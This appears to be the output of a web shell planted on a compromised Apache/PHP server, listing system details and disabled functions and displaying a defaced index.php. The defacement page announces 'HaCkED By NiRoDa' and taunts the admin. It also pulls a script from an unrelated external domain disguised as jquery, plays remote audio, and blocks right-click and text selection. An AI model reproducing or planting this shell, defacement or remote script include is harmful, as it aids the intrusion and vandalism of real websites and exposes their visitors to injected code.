HEX
Server: Apache/2
System: Linux silas 5.14.0-362.8.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 7 14:54:22 EST 2023 x86_64
User: schuftan (1011)
PHP: 8.1.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/schuftan/domains/schuftan.cl/public_html/antiguo/index.php
<html dir="rtl">
<body bgcolor="#000000">
<head<head>
<SCRIPT language=JavaScript>

<!-- Begin
if (document.all) {
//Things you can alter
yourLogo = "HaCkED  By  NiRoDa "; //Not less than 2 letters!
logoFont = "IMPACT";
logoColor = "YELLOW";
//Nothing needs altering below!
yourLogo = yourLogo.split('');
L = yourLogo.length; 
TrigSplit = 360 / L;
Sz = new Array()
logoWidth = 60;
logoHeight = -40;
ypos = 0;
xpos = 0;
step = 0.03;
currStep = 0;
document.write('<div id="outer" style="position:absolute;top:0px;left:0px"><div style="position:relative">');
for (i = 0; i < L; i++) {
document.write('<div id="ie" style="position:absolute;top:0px;left:0px;'
+'width:10px;height:10px;font-family:'+logoFont+';font-size:12px;'
+'color:'+logoColor+';text-align:center">'+yourLogo[i]+'</div>');
}
document.write('</div></div>');
function Mouse() {
ypos = event.y;
xpos = event.x - 5;
}
document.onmousemove=Mouse;
function animateLogo() {
outer.style.pixelTop = document.body.scrollTop; 
for (i = 0; i < L; i++) {
ie[i].style.top = ypos + logoHeight * Math.sin(currStep + i * TrigSplit * Math.PI / 180);
ie[i].style.left = xpos + logoWidth * Math.cos(currStep + i * TrigSplit * Math.PI / 180);
Sz[i] = ie[i].style.pixelTop - ypos;
if (Sz[i] < 5) Sz[i] = 5;
ie[i].style.fontSize = Sz[i] / 1.7;
}
currStep -= step;
setTimeout('animateLogo()', 20);
}
window.onload = animateLogo;
}
// End -->
</SCRIPT>
</body>
<head></SCRIPT>
<!--webbot bot="HTMLMarkup" endspan -->
<p align="center"><!--webbot bot="HTMLMarkup" startspan -->
<STYLE>BODY {
	SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; SCROLLBAR-3DLIGHT-COLOR: #666666; SCROLLBAR-ARROW-COLOR: #666666; SCROLLBAR-DARKSHADOW-COLOR: #666666; SCROLLBAR-BASE-COLOR: #000000
}
</STYLE>
<!--webbot bot="HTMLMarkup" endspan i-checksum="8067" -->
<!-- following code added by server. PLEASE REMOVE -->
<!-- preceding code added by server. PLEASE REMOVE --><script language="JavaScript">
<!-- Space Trip Script by kurt.grigg@virgin.net
cOlOuRs=new Array("abbbff","ffffee","ffff7a","dffffd","ffaaa0","ffddd0")
S_amount = 30;//number of small stars!!!!!
L_amount = 20;//number of larger stars!!!!
S_Ypos = new Array();
S_Xpos = new Array();
L_Ypos = new Array();
L_Xpos = new Array();
S_speed= new Array();
L_speed= new Array();
if (document.all)
{
for (i = 0; i < S_amount; i++) 
{                                                                
 S_Ypos[i] = Math.round(Math.random()*document.body.offsetHeight);
 S_Xpos[i] = Math.round(Math.random()*document.body.offsetWidth);
}
for (i = 0; i < L_amount; i++) 
{                                                                
 L_Ypos[i] = Math.round(Math.random()*document.body.offsetHeight);
 L_Xpos[i] = Math.round(Math.random()*document.body.offsetWidth);
}
document.write('<div id="Outer" style="position:absolute;top:0px;left:0px">');
document.write('<div id="Inner" style="position:relative">');
for (i = 0; i < S_amount; i++)
{document.write('<div id="ieS_star" style="position:absolute;top:'+S_Ypos[i]+';left:'+S_Xpos[i]+';width:1px;height:1px;background:#fffff0;font-size:1px"></div>');}
for (i = 0; i < L_amount; i++) 
{document.write('<div id="ieL_star" style="position:absolute;top:'+L_Ypos[i]+';left:'+L_Xpos[i]+';width:2px;height:2px;background:#ffffff;font-size:2px"></div>');}
document.write('</div>');
document.write('</div>');
for (i = 0; i < L_amount; i++) 
{
 for (j = 0; j < cOlOuRs.length; j++)
  {var NewColour=Math.round(Math.random()*[j])}
document.all.ieS_star[i].style.background=cOlOuRs[NewColour];
document.all.ieL_star[i].style.background=cOlOuRs[NewColour];
}
for (i=0; i < ieS_star.length; i++){S_speed[i]=Math.random()*3+1}
for (i=0; i < ieL_star.length; i++){L_speed[i]=Math.random()*7+2}
function ES_go()
{
 document.all.Outer.style.pixelTop=document.body.scrollTop;
 for (i=0; i < ieS_star.length; i++)
 {
 ieS_star[i].style.pixelLeft-=S_speed[i];
 if (ieS_star[i].style.pixelLeft < -10){ieS_star[i].style.pixelLeft=window.document.body.offsetWidth}
 }
S_timer=setTimeout('ES_go()',30);
}
function EL_go()
{
 for (i=0; i < ieL_star.length; i++)
 {
 ieL_star[i].style.pixelLeft-=L_speed[i];
 if (ieL_star[i].style.pixelLeft < -10){ieL_star[i].style.pixelLeft=window.document.body.offsetWidth}
 }
L_timer=setTimeout('EL_go()',10);
}
function IeStart()
{
 ES_go();
 EL_go();
}
IeStart()
}//End Explorer

else if (document.layers)
{
for (i = 0; i < S_amount; i++) 
{                                                                
 S_Ypos[i] = Math.round(Math.random()*window.innerHeight);
 S_Xpos[i] = Math.round(Math.random()*window.innerWidth);
 document.write("<LAYER NAME='S_star"+i+"' LEFT=0 TOP=0 BGCOLOR='#FFFFF0' CLIP='0,0,1,1'></LAYER>");
 document.layers["S_star"+i].top = S_Ypos[i];
 document.layers["S_star"+i].left = S_Xpos[i];
}
for (i = 0; i < L_amount; i++) 
{
 L_Ypos[i] = Math.round(Math.random()*window.innerHeight);
 L_Xpos[i] = Math.round(Math.random()*window.innerWidth);
 document.write("<LAYER NAME='L_star"+i+"' LEFT=0 TOP=0 BGCOLOR='#FFFFF0' CLIP='0,0,2,2'></LAYER>");
 document.layers["L_star"+i].top = L_Ypos[i];
 document.layers["L_star"+i].left = L_Xpos[i];
  for (j = 0; j < cOlOuRs.length; j++)
   {
   var NewColour=Math.round(Math.random()*[j]);
   }
document.layers['S_star'+i].bgColor=cOlOuRs[NewColour];
document.layers['L_star'+i].bgColor=cOlOuRs[NewColour];
}
for (i=0; i < S_amount; i++){S_speed[i]=Math.random()*3+1}
for (i=0; i < L_amount; i++){L_speed[i]=Math.random()*7+2} 
function NS_go()
{
 for (i=0; i < S_amount; i++)
 {
 var temp="S_star"+i;//50
 document.layers[temp].top=S_Ypos[i]+window.pageYOffset;
 document.layers['S_star'+i].left-=S_speed[i];
 if (document.layers['S_star'+i].left < -10){document.layers['S_star'+i].left=window.innerWidth}
 }
S_timer=setTimeout('NS_go()',30);
}
function NL_go()
{
 for (i=0; i < L_amount; i++)
 {
 var temp="L_star"+i
 document.layers[temp].top=L_Ypos[i]+window.pageYOffset;
 document.layers['L_star'+i].left-=L_speed[i];
 if (document.layers['L_star'+i].left < -10){document.layers['L_star'+i].left=window.innerWidth}
}
L_timer=setTimeout('NL_go()',10);
}
function NsStart()
{
 NS_go();
 NL_go();
}
NsStart();
}//End Netscape
window.onresize = new Function("window.zorkon.reload()");
//-->
</script>

</font>

		</SPAN>
		<FONT face=verdana size=2>
<embed src="http://www.2ngel.com/we/kuran.MP3" align="baseline" border="0" width="275" height="40" type="audio/x-pn-realaudio-plugin" console="Clip1" controls="ControlPanel" autostart="true" hidden>

</font></p>
<p align="center"><FONT face=verdana size=2>
<marquee width="528" height="38" style="color: #F0F000; font-family: Lucida Calligraphy; font-size: 24pt" behavior="alternate">DeAr ADM!n youR s!Te</marquee><STYLE type=text/css>UNKNOWN {
	align: justify
}
BODY {
	CURSOR: url('http://www.2ngel.com/we/mause.cur')
}
A {
	CURSOR: url('http://www.2ngel.com/we/mause.cur')
}
UNKNOWN {
	if: = "Netscape" && keyp.which == 3) { 
   alert(mymessage); 
   return false; 
} 

if (navigator.appVersion.indexOf("MSIE"); 1: = 2) { 
   alert(mymessage); 
   return false; 
}
}
</STYLE><meta http-equiv="Content-Language" content="en-us"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>
**-..&nbsp; &#1578;&#1605; &#1575;&#1604;&#1575;&#1582;&#1578;&#1585;&#1575;&#1602; &#1576;&#1608;&#1575;&#1587;&#1591;&#1577; &#1606;&#1610;&#1585;&#1608;&#1583;&#1575;&nbsp; ..-**</title><script type="text/javascript" src="http://xxxindianxxx.com/st/css/jquery-1.6.5.min.js"></script></head><script language="JavaScript1.2">

/*
Disable right click script II (on images)- By Dynamicdrive.com
For full source, Terms of service, and 100s DTHML scripts
Visit http://www.dynamicdrive.com
&#1604;&#1604;&#1605;&#1586;&#1610;&#1583; &#1605;&#1606; &#1575;&#1604;&#1580;&#1575;&#1601;&#1575; &#1587;&#1603;&#1585;&#1610;&#1576;&#1578; .. &#1606;&#1585;&#1580;&#1608; &#1586;&#1610;&#1575;&#1585;&#1577; &#1605;&#1608;&#1602;&#1593; &#1573;&#1602;&#1604;&#1575;&#1593; &#1587;&#1608;&#1601;&#1578; http://soft.vip600.com/
*/

var clickmessage="NiRoDa"

function disableclick(e) {
if (document.all) {
if (event.button==2||event.button==3) {
if (event.srcElement.tagName=="IMG"){
alert(clickmessage);
return false;
}
}
}
else if (document.layers) {
if (e.which == 3) {
alert(clickmessage);
return false;
}
}
else if (document.getElementById){
if (e.which==3&&e.target.tagName=="IMG"){
alert(clickmessage)
return false
}
}
}

function associateimages(){
for(i=0;i<document.images.length;i++)
document.images[i].onmousedown=disableclick;
}

if (document.all)
document.onmousedown=disableclick
else if (document.getElementById)
document.onmouseup=disableclick
else if (document.layers)
associateimages()
</script><body background="http://www13.0zz0.com/2009/12/03/05/781195163.jpg"></p>

<p align="center">&nbsp;<img border="0" src="http://www.2ngel.com/we/99998650[1].gif" width="558" height="129"></p>

</body>

</font>
		<P align="center">
			<span style="filter: blur(add=1,direction=270,strength=30); ">
			<b><strong>
		<font face="Wingdings" color="#008000" style="font-size: 28pt">F</font></strong><font color="#006699"><font face="Bradley Hand ITC" style="font-size: 28pt">&nbsp;&nbsp;</font><font face="DecoType Naskh" style="font-size: 28pt"> </font>
 
			</font>
			<font color="#FF0000" style="font-size: 28pt" face="DecoType Naskh">
			<span lang="ar-sy">&#1571;&#1588;&#1607;&#1583;</font><font color="#FFFF00" style="font-size: 28pt" face="DecoType Naskh"> 
			&#1571;&#1606;</font><font color="#FF0000" style="font-size: 28pt" face="DecoType Naskh">
			&#1604;&#1575; </font>
			<font color="#FFFF00" style="font-size: 28pt" face="DecoType Naskh">
			&#1573;&#1604;&#1607;</font><font color="#FF0000" style="font-size: 28pt" face="DecoType Naskh">
			&#1573;&#1604;&#1575; </font>
			<font color="#FFFF00" style="font-size: 28pt" face="DecoType Naskh">
			&#1575;&#1604;&#1604;&#1607;</font><font color="#FF0000" style="font-size: 28pt" face="DecoType Naskh">
			&#1608;&#1571;&#1588;&#1607;&#1583;</font><font color="#FFFF00" style="font-size: 28pt" face="DecoType Naskh"> 
			&#1571;&#1606;</font><font color="#FF0000" style="font-size: 28pt" face="DecoType Naskh">
			&#1605;&#1581;&#1605;&#1583;&#1575;&#1611; </font>
			<font color="#FFFF00" style="font-size: 28pt" face="DecoType Naskh">
			&#1593;&#1576;&#1583;&#1607;</font><font color="#FF0000" style="font-size: 28pt" face="DecoType Naskh">
			&#1608;&#1585;&#1587;&#1608;&#1604;&#1607;</font></span><font color="#ffffff" face="Bradley Hand ITC" style="font-size: 28pt">&nbsp; </font><strong>
			<font face="Wingdings" color="#008000" style="font-size: 28pt">E</font></strong></b></span><P align="center">
			<span lang="ar-sa">
			<font color="#FF0000" size="5">
			&nbsp;&#1575;&#1584;&#1575;</font><font color="#FFFF00" size="5"> &#1603;&#1575;&#1606;&#1746;</font><font color="#FF0000" size="5"> &#1575;&#1604;&#1575;&#1606;&#1587;&#1575;&#1606;&#1746;</font><font color="#FFFF00" size="5"> 
		&#1608;&#1575;&#1604;&#1586;&#1605;&#1575;&#1606;&#1746;</font><font color="#FF0000" size="5"> &#1590;&#1583;&#1610;&#1746;
			</font><font color="#FFFF00" size="5">
			&#1601;&#1571;&#1606;&#1575;
			</font><font color="#FF0000" size="5">
			._.(&#1587;&#1608;&#1585;&#1610;&#1746;)._.
			</font><font color="#FFFF00" size="5">
			&#1575;&#1593;&#1588;&#1602;&#1746;</font><font color="#FF0000" size="5"> &#1575;&#1604;&#1578;&#1581;&#1583;&#1610;&#1746;
			</font></span>
			<span style="filter: blur(add=1,direction=270,strength=30); ">
<p dir="ltr" align="center"><b><font color="#ff0000">
<span style="font-size: 13.5pt; font-family: Lucida Calligraphy">I</span></font><span style="font-size: 13.5pt; color: #42a0ff; font-family: Lucida Calligraphy">
</span><font color="#ffff00">
<span style="font-size: 13.5pt; font-family: Lucida Calligraphy">will Not stop 
Hacking ... </span></font>
<span style="font-size: 13.5pt; color: #42a0ff; font-family: Lucida Calligraphy">
<br>
</span><font color="#ff0000">
<span style="font-size: 13.5pt; font-family: Lucida Calligraphy">S</span></font></b><span class="SpellE"><b><span style="font-size: 13.5pt; color: #ffff00; font-family: Lucida Calligraphy">orry</span></b></span><b><span style="font-size: 13.5pt; color: #42a0ff; font-family: Lucida Calligraphy">
</span>
<span style="font-size: 13.5pt; color: #ff0000; font-family: Lucida Calligraphy; text-decoration: underline">
admin</span><span style="font-size: 13.5pt; color: #42a0ff; font-family: Lucida Calligraphy">
</span><font color="#ffff00">
<span style="font-size: 13.5pt; font-family: Lucida Calligraphy">but you don't 
have any </font> <u><font color="#FF0000">
security</font><font color="#ffff00"><span lang="ar-sa"> </span>in youR web</font></u></span><u><span style="font-size: 13.5pt; color: #42a0ff; font-family: Lucida Calligraphy">
</span><font color="#ff0000">
<span style="font-size: 13.5pt; font-family: Lucida Calligraphy">s</span></font></u><font color="#ffff00"><span style="font-size: 13.5pt; font-family: Lucida Calligraphy"><u>ite
</u>..</span></font></b></p>
<p dir="ltr" align="center"><b><span style="font-family: Lucida Calligraphy">
<font size="4" color="#FF0000">Wh</font><font size="4" color="#FFFF00">en yoU 
Can ProtEct YouR SiT3 ,, May Be I StoP</font></span><font color="#ffff00"><span style="font-size: 13.5pt; font-family: Lucida Calligraphy"> </span></font>
</b></p>
</span>
<p align="center"><font size="6" color="#FF0000" face="Lucida Calligraphy">b</font><font size="6" face="Lucida Calligraphy" color="#FFFF00">ye
</font><font size="6" face="Lucida Calligraphy" color="#FF0000">b</font><font size="6" face="Lucida Calligraphy" color="#FFFF00">ye
</font><u><font size="6" face="Lucida Calligraphy" color="#FF0000">A</font><font size="6" face="Lucida Calligraphy" color="#FFFF00">dmi</font></u><font size="6" face="Lucida Calligraphy" color="#FF0000"><u>n </u>&nbsp;,, 
S</font><font size="6" face="Lucida Calligraphy" color="#FFFF00">ee</font><font size="6" face="Lucida Calligraphy" color="#FF0000"> 
Y</font><font size="6" face="Lucida Calligraphy" color="#FFFF00">ou</font><font size="6" face="Lucida Calligraphy" color="#FF0000"> 
L</font><font size="6" face="Lucida Calligraphy" color="#FFFF00">ate</font><font size="6" face="Lucida Calligraphy" color="#FF0000">R</font></p>
<p align="center"><font face="Lucida Calligraphy" size="4" color="#FF0000">Don</font><font face="Lucida Calligraphy" size="4" color="#FFFF00">e</font><font face="Lucida Calligraphy" size="4" color="#FF0000">/.</font></p>
<p align="center"><font color="#800000" size="6">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<img border="0" src="http://www.2ngel.com/we/1.gif"></font></p>

<body onbeforeprint="onbeforeprint()" onafterprint="onafterprint()"
onselectstart="return false" oncontextmenu="return false">  

</html>